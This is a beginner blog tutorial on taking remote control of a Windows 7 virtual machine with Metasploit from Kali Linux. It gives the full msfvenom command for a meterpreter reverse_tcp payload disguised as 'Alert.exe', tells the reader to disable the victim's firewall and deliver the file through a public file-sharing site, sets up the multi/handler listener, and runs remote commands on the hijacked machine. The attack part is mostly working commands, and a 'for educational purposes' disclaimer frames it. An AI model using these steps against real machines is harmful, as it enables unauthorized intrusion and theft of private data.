So what is Metasploit? It is basically a security testing framework that is used to audit a system and find the possible vulnerabilities which can be exploited by a hacker. But, hackers use it as a tool to penetrate into systems and steal private information such as important files, passwords etc from them.
In this post, we will be using Kali Linux, a Linux distribution made especially for Security Auditing, Digital Forensics and such things. We have set up a virtual environment so that we can demonstrate how it works. If you are a total beginner with Linux, i suggest you learn about the basic commands linux here. These will eventually be helpful if you want to learn more about hacking and stuff. We will be penetrating into a Windows 7 virtual machine.
IMPORTANT NOTE: THE FOLLOWING TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT INTEND TO PROMOTE ANY KIND OF MALICIOUS PRACTICES. THE USERS THEMSELVES WILL BE RESPONSIBLE FOR HOW THEY USE IT. SO USE IT AT YOUR OWN RISK!
Let's begin!
=>Open VirtualBox and create a virtual machine for Kali Linux. Click here for a step by step guide about how to install Kali Linux in a virtual machine.
=>Then, install Windows 7 in a similar manner in a different virtual machine.
=>In VirtualBox application, click on Kali Linux machine and then click on Settings. Inside Network section, change the Attached To: From NAT to Bridged Adapter. Click OK. Do the same for Windows Machine.
=>Power on both the machines. Now, inside Kali Linux, open a Terminal and type
ifconfig
This will show you the IP address of the Virtual Machine. In our case, it is 192.168.1.9.
=>Disable firewall in Windows machine. There are plenty of resources on the internet that will tell you how to do that.
=>The next step is to generate a payload. A payload is a piece of code that will run on the victim's machine and in our case, will give us access to the machine. To generate a payload, type:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 -f exe > ~/Desktop/Alert.exe
Let's see what it means:
msfvenom
This is a combination of two great tools, msfpayload (the part of metasploit framework that generates payloads) and msfencode (that encodes the payload into the desired format). This command generates the payload according to the given arguments/options.
-p windows/meterpreter/reverse_tcp
-p is used to specify the type of payload. Since we want to attack a Windows PC, we use windows/meterpreter/reverse_tcp. Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. reverse_tcp provides a reverse shell to the attacker, who can then get the access to the victim's machine.
LHOST 192.168.1.9
The attacker's IP Address.
LPORT 4444
The port number on attacker's machine on which the meterpreter session will connect to.
-f exe
The file format of payload generated.
~/Desktop/alert.exe
The path of output file for the payload.
=>Now, you will see that a file named alert.exe has been created on the Desktop. Transfer this file to the victim machine. For this, you can use websites like expirebox.com, which provides a great way to temporarily share files over the internet (and it's easy & free too!)
=>Now, type
msfconsole
inside the terminal and hit enter. It may take some time to load, so be patient!
=>Now type in the following commands:
use multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
exploit
What do they mean:
use multi/handler
and
use exploit/multi/handler
Specify which handler to use
set payload windows/meterpreter/reverse_tcp
Sets the required payload (same as the one payload created by msfvenom)
set LHOST 192.168.1.9
Listen on this IP for incoming requests (same as the payload's LHOST)
set LPORT 4444
The port on which meterpreter sessions will be opened (same as the payload's LPORT).
exploit
Begin the exploit
Now, you will see something like this:
=>At this point, double click on the alert.exe file inside the victim machine.
If all went well, you will see that a meterpreter session has been opened. Congratulations!!! You just hacked your way into a Windows system!!! :)
=>Let's have some fun now. To open paint inside the victim's machine, type this inside the terminal:
execute -f mspaint
=>To get a windows command prompt session from the remote machine, simply type
shell
From there, you can use windows shell commands like dir,ipconfig etc.
=>Let's do one last trick: Type the following command to open a dialog box inside the victim machine:
msg * "You have been hacked!!!"
There are literally a lot of things you can do to the victim machine, like sending files to the victim or get access to their passwords and other sensitive information.
Security Tip: Always keep your firewall on and your Anti Virus up-to-date. DO NOT open applications from untrusted sources. And finally, spread the word about security.
And that's it for now! Hope you like it! Comment below for suggestions and queries :D
No comments:
Post a Comment